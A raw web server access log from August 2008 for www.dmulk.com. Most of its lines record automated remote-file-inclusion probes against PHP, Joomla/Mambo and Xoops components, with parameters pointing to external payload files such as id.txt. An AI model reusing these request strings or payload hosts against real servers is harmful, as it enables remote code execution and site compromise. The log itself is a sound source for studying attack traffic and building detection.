74.53.240.146 - - [21/Aug/2008:09:59:31 -0700] "GET //member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:59:31 -0700] "GET /logs//member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:59:31 -0700] "GET /logs/access_080209.log//member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:59:33 -0700] "GET /logs/access_080219.log//member_Login.php?add_user_pass=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.33.141.40 - - [21/Aug/2008:09:59:49 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?s=1356e744aff697fbe9e2f45db07b80a9&showtopic=36984&st=0&p=522096&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:59:49 -0700] "GET /logs/access_080219.log//member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:09:59:56 -0700] "GET /logs/access_071107.log HTTP/1.0" 200 32202 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:10:00:04 -0700] "GET /logs/access_080219.log//member_Login.php?add_user_pass=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:10:00:13 -0700] "GET /logs/access_080219.log//member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:00:16 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:00:16 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:00:16 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:00:31 -0700] "GET /logs/access_080724.log/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:00:31 -0700] "GET /expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.79.182.204 - - [21/Aug/2008:10:00:34 -0700] "GET /logs/access_071228.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=%22Poweredhttp://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.79.182.204 - - [21/Aug/2008:10:00:34 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=%22Poweredhttp://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.79.182.204 - - [21/Aug/2008:10:00:34 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=%22Poweredhttp://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:00:36 -0700] "GET /logs/access_080330.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:00:40 -0700] "GET /logs/access_080105.log/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:00:43 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:00:43 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:00:43 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:00:47 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:00:47 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:00:47 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:00:48 -0700] "GET /logs/access_080330.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:01:03 -0700] "GET /logs/access_080330.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:01:20 -0700] "GET /logs/access_080724.log/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:01:21 -0700] "GET /expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:01:21 -0700] "GET /logs/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:01:36 -0700] "GET /logs/access_080724.log/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:01:36 -0700] "GET /expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:01:40 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:01:40 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:01:41 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:01:45 -0700] "GET /logs/access_080105.log/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:01:48 -0700] "GET /logs/access_080330.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:10:02:02 -0700] "GET /logs/avatar.php?page=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:10:02:03 -0700] "GET /avatar.php?page=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:10:02:10 -0700] "GET /logs/avatar.php?page=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:10:02:11 -0700] "GET /avatar.php?page=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:10:02:12 -0700] "GET /logs/avatar.php?page=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:10:02:12 -0700] "GET /avatar.php?page=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:02:25 -0700] "GET /logs/access_080105.log/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:10:02:34 -0700] "GET /logs/avatar.php?page=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:10:02:34 -0700] "GET /avatar.php?page=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.12 - - [21/Aug/2008:10:03:47 -0700] "GET /logs/access_080218.log//components/com_user/controller.php?option=http://cleansafebodypiercing.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.12 - - [21/Aug/2008:10:03:47 -0700] "GET //components/com_user/controller.php?option=http://cleansafebodypiercing.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.12 - - [21/Aug/2008:10:03:48 -0700] "GET /logs//components/com_user/controller.php?option=http://cleansafebodypiercing.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.12 - - [21/Aug/2008:10:03:49 -0700] "GET /logs/access_080214.log//components/com_user/controller.php?option=http://cleansafebodypiercing.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:03:50 -0700] "GET /logs/access_080728.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:03:57 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:04:06 -0700] "GET /logs/access_080728.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:04:13 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:04:21 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:04:22 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:04:28 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:04:28 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:10:04:38 -0700] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:05:02 -0700] "GET /logs/access_080728.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:05:02 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:05:20 -0700] "GET /logs/access_080728.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:10:05:23 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://wtv.mathiaskarge.de//v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.206.113.104 - - [21/Aug/2008:10:05:39 -0700] "GET /logs/access_080628.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [21/Aug/2008:10:05:41 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 200 9995 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [21/Aug/2008:10:05:42 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.111.194 - - [21/Aug/2008:10:05:51 -0700] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [21/Aug/2008:10:05:51 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [21/Aug/2008:10:05:51 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.74.198.93 - - [21/Aug/2008:10:05:52 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.asoc-posidonia.es/modules/sp.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
77.74.198.93 - - [21/Aug/2008:10:05:52 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.asoc-posidonia.es/modules/sp.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
213.206.113.104 - - [21/Aug/2008:10:05:54 -0700] "GET /logs/access_080503.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/jaemid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [21/Aug/2008:10:06:08 -0700] "GET /logs//components/errors.php?error=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [21/Aug/2008:10:06:08 -0700] "GET //components/errors.php?error=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:06:12 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:06:12 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:10:06:14 -0700] "HEAD /retreat1/webcam/retreat1_00434.jpg HTTP/1.1" 200 0 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:10:06:14 -0700] "GET /retreat1/webcam/retreat1_00434.jpg HTTP/1.1" 200 53026 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
195.56.111.194 - - [21/Aug/2008:10:06:20 -0700] "GET /logs/access_080630.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.79.182.204 - - [21/Aug/2008:10:06:21 -0700] "GET /logs/access_080116.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=%22Poweredhttp://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:10:07:08 -0700] "GET /logs/access_080810.log/?mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:10:07:10 -0700] "GET /?mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 9877 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:10:07:11 -0700] "GET /logs/?mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 200 61570 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:07:23 -0700] "GET /logs/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:07:24 -0700] "GET /expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:07:37 -0700] "GET /logs/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:07:38 -0700] "GET /expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:07:54 -0700] "GET /logs/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:10:07:54 -0700] "GET /expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:08:18 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:08:18 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.181.210.195 - - [21/Aug/2008:10:08:45 -0700] "GET /logs/scripts.log//index.php3?act=http://geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.210.195 - - [21/Aug/2008:10:08:46 -0700] "GET //index.php3?act=http://geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.210.195 - - [21/Aug/2008:10:08:46 -0700] "GET /logs//index.php3?act=http://geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.210.195 - - [21/Aug/2008:10:09:18 -0700] "GET /logs/access_080703.log//index.php3?act=http://geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.68.128 - - [21/Aug/2008:10:09:25 -0700] "GET /logs/access_080324.log/!rfihttp://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.128 - - [21/Aug/2008:10:09:25 -0700] "GET /logs/!rfihttp://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.128 - - [21/Aug/2008:10:09:25 -0700] "GET /!rfihttp://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.128 - - [21/Aug/2008:10:09:31 -0700] "GET /logs/access_080124.log/!rfihttp://www.unitep.it/iscrizioni/include/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:10:10:01 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:10:10:02 -0700] "GET /lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.63.202.208 - - [21/Aug/2008:10:10:34 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.63.202.208 - - [21/Aug/2008:10:10:34 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.63.202.208 - - [21/Aug/2008:10:10:39 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.63.202.208 - - [21/Aug/2008:10:10:40 -0700] "GET //index.php?DOCUMENT_ROOT=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 200 9887 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.53.6 - - [21/Aug/2008:10:10:54 -0700] "GET /logs/access_080229.log//modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.53.6 - - [21/Aug/2008:10:10:54 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.53.6 - - [21/Aug/2008:10:10:55 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:11:04 -0700] "GET /logs/access_080616.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
